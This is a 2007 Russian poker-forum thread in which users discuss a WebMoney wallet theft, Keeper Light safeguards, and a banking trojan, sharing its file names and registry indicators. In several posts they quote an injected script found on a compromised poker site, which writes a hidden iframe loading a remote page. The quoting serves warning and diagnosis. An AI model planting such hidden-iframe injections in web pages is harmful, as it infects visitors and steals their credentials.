Регистрация
Регистрация Поиск Сообщество  
Важные объявления
Старый 13.12.2007, 06:35   #381 (permalink)
Бессмертный
 
Аватар для vano
 
Регистрация: 12.11.2004
Адрес: Санкт-Петербург
Сообщений: 6,266
Отправить сообщение для vano с помощью ICQ
Лайт-кипер - один из самых надежных типов вебманевских киперов (мне он представляется гораздо более надежным, чем полнофункциональный кипер)

Bull. Скажи пожалуйста были ли выполнены следующие мероприятия, гарантирующие безопасность при пользовании лайтом?

1. Был ли установлен на вебманевском сайте фильтр на ip-адреса?
2. Сертификат лайта устанавливался в "неэкспортируемом" варианте?

Если все это было сделано, и воровство произошло при выключенном компе, то вирус должен был работать только по следующей схеме.

1. Сертификат был украден изначально, в самый начальный момент установки его в систему. (После того, как он установлен в неэкспортируемом варианте, украсть его невозможно, хоть под суперадмином)

2. Вирус украл учетные данные электронной почты и используя их вор потом снял ip-фильтрацию.

Честно говоря, я не совсем уверен в наличии такого сложного вируса или комплекса вирусов... (скорее всего все-таки не были соблюдены все меры безопасности)
vano вне форума      
Старый 13.12.2007, 07:56   #382 (permalink)
Бессмертный
 
Аватар для vano
 
Регистрация: 12.11.2004
Адрес: Санкт-Петербург
Сообщений: 6,266
Отправить сообщение для vano с помощью ICQ
Цитата:
Сообщение от bull писал вс, 09 декабря 2007 19:37
Другое дело, что wm-кипер (это даже хакеры доказали) - шпионская по сути своей программа. Она считывает такие данные о машине, цель знания которых очень трудно себе представить. И если вирус просто ворует сертификат, а потом "хозяин" лезет в кошелек с любой машины, то при наличии доброй воли владельцев ресурса, такую халяву можно было бы запросто пресечь. Но этого не делается, что наводит на грустные размышления. например, об имеющем место сговоре
Bull. Мне лично вся эта ситуация неприятна по следующей причине - вебманями пользуюсь уже около 5 лет, наблюдал как развивалась эта система. Ничего более удобного и полнофункционального в мире нет для онлайнбизнеса. Что касается "грустных размышлений". "Лайт" - специально сделан для того, чтобы имея сертификат можно было заходить с любого компа без установки программного обеспечения, просто из под браузера. И это реально очень удобно (удобнее чем программа wm-кипер) Плюс ещё можно за проксей работать.
Вебманевские механизмы гарантии сохранности ваших денег - самые надежные. Например на порядок надежнее, чем пользование визами и прочим пластиком в сети. То, что вебмани стали объектом хаккерских атак - это лишь следствие роста и развития этой системы до масштабов, интересных серьезным ворам.
Но когда предоставляются механизмы, гарантирующие безопасность, для того, чтобы они работали, надо этими механизмами пользоваться.
vano вне форума      
Старый 13.12.2007, 17:08   #383 (permalink)
Бессмертный
 
Аватар для Bull
 
Регистрация: 06.04.2005
Адрес: Ростов
Сообщений: 2,716
Цитата:
Сообщение от vano писал чт, 13 декабря 2007 06:35
Лайт-кипер - один из самых надежных типов вебманевских киперов (мне он представляется гораздо более надежным, чем полнофункциональный кипер)
Мне до последнего времени тоже так представлялось

Цитата:
Сообщение от Цитата:
Bull. Скажи пожалуйста были ли выполнены следующие мероприятия, гарантирующие безопасность при пользовании лайтом?

1. Был ли установлен на вебманевском сайте фильтр на ip-адреса?
2. Сертификат лайта устанавливался в "неэкспортируемом" варианте?
vano, дело в том, что во многих вопросах я абсолютный или относительный ламер и этого я не скрываю. Просто ВМ пользуюсь уже лет 7 и никогда у меня не воровали денег при всем моем ламерстве. теперь это случилось. И пути два: повысить безопасность. если есть нарушения с моей стороны, но он не гарантирует меня от краж, думаю, ты с этим согласишься или перестать пользоваться ВМ, хотя во всем остальном мне эта система до сих пор очень нравилась. Я на них бочку не гоню, просто поразмышлял немного.

Цитата:
Сообщение от Цитата:
Если все это было сделано, и воровство произошло при выключенном компе, то вирус должен был работать только по следующей схеме.

1. Сертификат был украден изначально, в самый начальный момент установки его в систему. (После того, как он установлен в неэкспортируемом варианте, украсть его невозможно, хоть под суперадмином)

2. Вирус украл учетные данные электронной почты и используя их вор потом снял ip-фильтрацию.

Честно говоря, я не совсем уверен в наличии такого сложного вируса или комплекса вирусов... (скорее всего все-таки не были соблюдены все меры безопасности)
тут ситуация какая. Как я уже писал, я воспользовался помощью Касперского на его форуме, провел все положенные процедуры, выслал все необходимые логи. Сейчас идет там переписка. нашлась подозрительная прога или часть проги. Думаю, в конце концов, какие-то ответы будут выявлены и я проинформирую.

Цитата:
Сообщение от Цитата:
Bull. Мне лично вся эта ситуация неприятна по следующей причине - вебманями пользуюсь уже около 5 лет, наблюдал как развивалась эта система. Ничего более удобного и полнофункционального в мире нет для онлайнбизнеса.
Выше свои собственные впечатления и опыт работы с ВМ я уже обрисовал. В принципе согласен, но эта крада что-то совсем смешала мои мысли по поводу ВМ

Цитата:
Сообщение от Цитата:
Что касается "грустных размышлений". "Лайт" - специально сделан для того, чтобы имея сертификат можно было заходить с любого компа без установки программного обеспечения, просто из под браузера. И это реально очень удобно (удобнее чем программа wm-кипер) Плюс ещё можно за проксей работать.
Вебманевские механизмы гарантии сохранности ваших денег - самые надежные. Например на порядок надежнее, чем пользование визами и прочим пластиком в сети. То, что вебмани стали объектом хаккерских атак - это лишь следствие роста и развития этой системы до масштабов, интересных серьезным ворам.
Но когда предоставляются механизмы, гарантирующие безопасность, для того, чтобы они работали, надо этими механизмами пользоваться.
Да вот, придется все это изучать и начинать пользоваться. Или не пользоваться ВМ. В общем, я жду пока результатов расследования Касперского. если с помощью моего компа удастся выявить хоть что-нибудь о природе этого вируса - многих проблем многим пользователям удастся избежать.
__________________
Cuius rei demonstrationem mirabilem sane setex hanc marginis exiguitas non caparet

Bull вне форума      
Старый 13.12.2007, 17:54   #384 (permalink)
Бессмертный
 
Аватар для kozmor
 
Регистрация: 21.07.2005
Адрес: Питер
Сообщений: 3,351
Ну вот оказывается пользователь texas-holdem дает ссылки на троян!!! А вы говорите это бред! Булл, посмотри не заходил ли ты по его ссылкам?
__________________
По всем вопросам пишите на oleg_kan@rambler.ru
kozmor вне форума      
Старый 13.12.2007, 18:29   #385 (permalink)
Бессмертный
 
Аватар для lappa
 
Регистрация: 14.09.2005
Адрес: Москва
Сообщений: 2,658
Я слабо разбираюсь в скриптах, но компетентный ответ
[Зарегистрироваться?] 20&start=20
Вредоносный код есть.
__________________
Патипокер-воры. Не играю на пати и bwin! В срачах не участвую, на провокации посылаю в жопу.
lappa вне форума      
Старый 13.12.2007, 18:39   #386 (permalink)
Увлечённый
 
Аватар для alexejv
 
Регистрация: 23.01.2006
Адрес: Кёльн
Сообщений: 604
Отправить сообщение для alexejv с помощью ICQ
vano: по моему проблема лайт-кипера в том, что он не может работать с кошельком, который уже создан в "нормальном" кипере. Т.е. лично мне уже поздно переходить я считаю, у меня BL к 300 подбирается, жалко терять.
Или там есть механизмы объединения ?
alexejv вне форума      
Старый 13.12.2007, 19:08   #387 (permalink)
Бессмертный
 
Аватар для Bull
 
Регистрация: 06.04.2005
Адрес: Ростов
Сообщений: 2,716
В общем, результат обращения за помощью к Касперскому имеется.

1. По крайней мере на одном покерном сайте имеется вредоносный код. Этот сайт я посещал по ссылке. Откуда взял ссылку - не помню, но скорее всего с форума. Просто не буду больше ходить, потому что форумскими силами мы проблему не решим. нельзя же премодерировать ЛЮБОЙ постинг со ссылками до проверки его Касперским, это абсурд. так что лучше не ходить по неизвестным, даже если это покерный сайт.

2. С того сайта мой троян или нет - неизвестно, но это Trojan-Spy.Win32.banker.quo
Правда, не сказали, известная ли это уже штука ли нет.

3. По крайней мере, стало известно, что зараза создает папку C:\Program Files\Internet Connection Counter-Rus\, файл simcard1.dll в системной папке, где он не обнаруживается ни обычным поиском, ни визуально и код
O2 - BHO: Flash Module - {E7A4C0C8-2BFF-4241-9E8C-92E10245EC28} - simcard1.dll (file missing)

Вот пока что стало известно. Короче говоря, свой комп я благодаря всему этому практически излечил - сейчас еще раз AVZ продеру и все.
Так же жду ответа от кого-ниубдь из форумчан, как устранить дыры в своей безопасности, которые я указал по полученным логам и которые были отмечены Касперским
__________________
Cuius rei demonstrationem mirabilem sane setex hanc marginis exiguitas non caparet

Bull вне форума      
Старый 13.12.2007, 19:12   #388 (permalink)
Увлечённый
 
Регистрация: 05.09.2006
Адрес: Санкт-Петербург
Сообщений: 401
Отправить сообщение для Fireball с помощью ICQ
Цитата:
Сообщение от k0zm0r писал вт, 11 декабря 2007 20:35
Мне летом пришел троян от журнала CGM в письме и ломанули акк в ЕП, я успел тогда заморозить счет... А ты говоришь бред.. Я хочу людей предупредить чтобы аккуратней были...не понял твоих эмоций.. :?
Спам в личную почту - это совсем другой способ, так как его легко и просто автоматизировать. Не вижу аналогии вообщем.

Цитата:
Сообщение от Профи писал ср, 12 декабря 2007 12:01
Комп нужно от троянов защищать: ВМ вместо пользователя не сможет это сделать.
Об этом я распинаюсь почти на каждой странице этой ветки, но всем пофигу

Цитата:
Сообщение от Профи писал ср, 12 декабря 2007 12:06
P.S. Напишу статью об этом.
Если будешь писать конкретно про безопасность WM, можешь мой самый большой пост взять из этой ветки, может тебя хоть послушают

Цитата:
Сообщение от alexejv писал чт, 13 декабря 2007 18:39
vano: по моему проблема лайт-кипера в том, что он не может работать с кошельком, который уже создан в "нормальном" кипере. Т.е. лично мне уже поздно переходить я считаю, у меня BL к 300 подбирается, жалко терять.
Или там есть механизмы объединения ?
Можно прикреплять несколько WM ID к одному аттестату, но BL все равно будет у каждого свой. Но через passport.webmoney.ru можно будет увидеть прикрепленные и их BL.
А зачем тебе BL нужен? На мой взгляд, это только для онлайн-магазинов каких-нить. Вообщем, чтобы повысить доверие незнакомых людей к тебе. А так он больше ничего не значит, а только выражает через какую-то формулу объем, количество переводов и количество респондентов, с которыми осуществляются переводы.
Fireball вне форума      
Старый 13.12.2007, 19:53   #389 (permalink)
Увлечённый
 
Аватар для alexejv
 
Регистрация: 23.01.2006
Адрес: Кёльн
Сообщений: 604
Отправить сообщение для alexejv с помощью ICQ
Цитата:
Сообщение от Fireball писал чт, 13 декабря 2007 19:12
А зачем тебе BL нужен? На мой взгляд, это только для онлайн-магазинов каких-нить.
Ну дык а я кто?
alexejv вне форума      
Старый 13.12.2007, 21:04   #390 (permalink)
Бессмертный
 
Аватар для Grey
 
Регистрация: 30.04.2004
Сообщений: 3,612
Цитата:
Сообщение от bull писал

1. По крайней мере на одном покерном сайте имеется вредоносный код.
Имя в студию. Лучше русскими буквами, чтобы по ссылке нельзя было перейти.
__________________
Arthur Grey
Grey вне форума      
Старый 13.12.2007, 21:12   #391 (permalink)
Увлечённый
 
Аватар для alexejv
 
Регистрация: 23.01.2006
Адрес: Кёльн
Сообщений: 604
Отправить сообщение для alexejv с помощью ICQ
Цитата:
Сообщение от Grey писал чт, 13 декабря 2007 21:04
Цитата:
Сообщение от bull писал

1. По крайней мере на одном покерном сайте имеется вредоносный код.
Имя в студию. Лучше русскими буквами, чтобы по ссылке нельзя было перейти.
на пит*********.ру - полагаю.
Вот код вируса: он переводит на другую страницу:

Цитата:
Сообщение от Цитата:
<SCRIPT>window.status='Done';document.write('<ifra me name=7f2006f src=\'[Зарегистрироваться?]'+Math.round(Math.random()*21945)+'5ea\' width=133 height=165 style=\'display: none\'></iframe>')</SCRIPT>
alexejv вне форума      
Старый 13.12.2007, 23:08   #392 (permalink)
Увлечённый
 
Регистрация: 05.09.2006
Адрес: Санкт-Петербург
Сообщений: 401
Отправить сообщение для Fireball с помощью ICQ
Цитата:
Сообщение от alexejv писал чт, 13 декабря 2007 21:12
Вот код вируса: он переводит на другую страницу:

Цитата:
Сообщение от Цитата:
<SCRIPT>window.status='Done';document.write('<ifra me name=7f2006f src=\'[Зарегистрироваться?]'+Math.round(Math.random()*21945)+'5ea\' width=133 height=165 style=\'display: none\'></iframe>')</SCRIPT>
Ну не переводит, а типа открывает страницу незаметно для пользователя Вполне возможно, что поломали сайт и запихали туда такой код. Странно, что до сих пор владелец ничего не заметил.
А антивирус ругается на что-нить?
Fireball вне форума      
Старый 13.12.2007, 23:36   #393 (permalink)
Бессмертный
 
Аватар для Bull
 
Регистрация: 06.04.2005
Адрес: Ростов
Сообщений: 2,716
Цитата:
Сообщение от Fireball писал чт, 13 декабря 2007 23:08
Цитата:
Сообщение от alexejv писал чт, 13 декабря 2007 21:12
Вот код вируса: он переводит на другую страницу:

Цитата:
Сообщение от Цитата:
<SCRIPT>window.status='Done';document.write('<ifra me name=7f2006f src=\'[Зарегистрироваться?]'+Math.round(Math.random()*21945)+'5ea\' width=133 height=165 style=\'display: none\'></iframe>')</SCRIPT>
Ну не переводит, а типа открывает страницу незаметно для пользователя Вполне возможно, что поломали сайт и запихали туда такой код. Странно, что до сих пор владелец ничего не заметил.
А антивирус ругается на что-нить?
Если бы он ругался, то вопроса не возникло бы.
__________________
Cuius rei demonstrationem mirabilem sane setex hanc marginis exiguitas non caparet

Bull вне форума      
Старый 14.12.2007, 00:13   #394 (permalink)
Увлечённый
 
Аватар для alexejv
 
Регистрация: 23.01.2006
Адрес: Кёльн
Сообщений: 604
Отправить сообщение для alexejv с помощью ICQ
Цитата:
Сообщение от Fireball писал чт, 13 декабря 2007 23:08
Цитата:
Сообщение от alexejv писал чт, 13 декабря 2007 21:12
Вот код вируса: он переводит на другую страницу:

Цитата:
Сообщение от Цитата:
<SCRIPT>window.status='Done';document.write('<ifra me name=7f2006f src=\'[Зарегистрироваться?]'+Math.round(Math.random()*21945)+'5ea\' width=133 height=165 style=\'display: none\'></iframe>')</SCRIPT>
Ну не переводит, а типа открывает страницу незаметно для пользователя Вполне возможно, что поломали сайт и запихали туда такой код. Странно, что до сих пор владелец ничего не заметил.
А антивирус ругается на что-нить?
похоже действительно без его ведома там вирус. Погуглил - такая напасть сейчас у сравнительно многих появилась в последние дни. Я подозреваю дырку в каком-нить сайтовом движке....
alexejv вне форума      
Старый 14.12.2007, 00:22   #395 (permalink)
Бессмертный
 
Регистрация: 17.02.2004
Адрес: Russia
Сообщений: 4,469
Цитата:
Сообщение от alexejv писал пт, 14 декабря 2007 00:13
похоже действительно без его ведома там вирус. Погуглил - такая напасть сейчас у сравнительно многих появилась в последние дни. Я подозреваю дырку в каком-нить сайтовом движке....
Да, у меня была аналогичная проблема, но вовремя предупредили, быстро убрал :(. Как я понял из описания, вирус сначала тырит логины и пароли к хостингу, запомненные в ФТП-программах, а потом дописывает в индексные файлы свои фреймы со ссылкой на заражённую страницу. Правда, мне ещё повезло - страница не была заражена, ибо это ещё и довольно безопасные кликеры юзают.
Yura вне форума      
Старый 14.12.2007, 07:21   #396 (permalink)
Ветеран
 
Аватар для Mercator
 
Регистрация: 25.05.2005
Адрес: Москва
Сообщений: 1,210
Как можно узнать, заходил ли я на этот сайт?
Mercator вне форума      
Старый 14.12.2007, 08:02   #397 (permalink)
Бессмертный
 
Аватар для Bull
 
Регистрация: 06.04.2005
Адрес: Ростов
Сообщений: 2,716
Цитата:
Сообщение от Mercator писал пт, 14 декабря 2007 07:21
Как можно узнать, заходил ли я на этот сайт?
Лучше вообще не гадать, а воспользоваться вот этим:
[Зарегистрироваться?]
__________________
Cuius rei demonstrationem mirabilem sane setex hanc marginis exiguitas non caparet

Bull вне форума      
Старый 14.12.2007, 08:23   #398 (permalink)
Ветеран
 
Аватар для Mercator
 
Регистрация: 25.05.2005
Адрес: Москва
Сообщений: 1,210
Меня интересует в целом, как узнать, заходил ли я по некоему адресу. Т.е. я хочу ввести этот адрес в определённую программу и она мне ответит, заходил ли я на него. Существует такая прога?
P.S. Журнал браузера не предлагать, там далеко не всё.
Mercator вне форума      
Старый 14.12.2007, 08:24   #399 (permalink)
Увлечённый
 
Аватар для Tourist2007
 
Регистрация: 07.05.2007
Адрес: London
Сообщений: 489
Отправить сообщение для Tourist2007 с помощью ICQ
Короче надо специально человека нанимать, чтобы он следил за отсутствием вирусов на твоем компе.. :( Заколебало.
__________________
Как от медицины нет пользы, если она не изгоняет страданий тела, так и от философии нет пользы, если она не изгоняет страданий души.
Tourist2007 вне форума      
Старый 14.12.2007, 13:24   #400 (permalink)
Бессмертный
 
Аватар для Bull
 
Регистрация: 06.04.2005
Адрес: Ростов
Сообщений: 2,716
Цитата:
Сообщение от Mercator писал пт, 14 декабря 2007 08:23
Меня интересует в целом, как узнать, заходил ли я по некоему адресу. Т.е. я хочу ввести этот адрес в определённую программу и она мне ответит, заходил ли я на него. Существует такая прога?
Сомневаюсь.
И даже таковая ничего не найдет. если скажем вирус чистит все следы "захода", что совсем не трудно
__________________
Cuius rei demonstrationem mirabilem sane setex hanc marginis exiguitas non caparet

Bull вне форума      

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Троян у хайроллеров CGM.RU Новости, статьи, репортажи.. 0 13.12.2013 09:40
Троян блокирован _Ali_ Техническая поддержка форума 9 29.11.2012 22:21
Троян в SharkScope!!! Evgesha Программное обеспечение 15 05.11.2009 21:08
Как удалить троян? Buracino Поговорим за жизнь 22 25.09.2007 23:37
троян ежык Поговорим за жизнь 12 18.11.2006 15:21



Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks are Выкл.
Pingbacks are Выкл.
Refbacks are Выкл.

Быстрый переход
Правила форумов CGM Контакты Справка Обратная связь CGM.ru Архив Вверх Главная
 
Использование материалов сайта разрешено только при наличии активной ссылки на источник.
Все права на картинки и тексты принадлежат Информационному агентству CGM и их ПАРТНЕРАМ. Политика конфидециальности
CGM.ru на Youtube CGM.ru на Google+ CGM.ru в Twitter CGM.ru на Facebook CGM.ru в vKontakte CGM.ru в Instagram

В сотрудничестве с Pokeroff.ru
Текущее время: 06:45. Часовой пояс GMT +3.
Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2024, vBulletin Solutions, Inc. Перевод: zCarot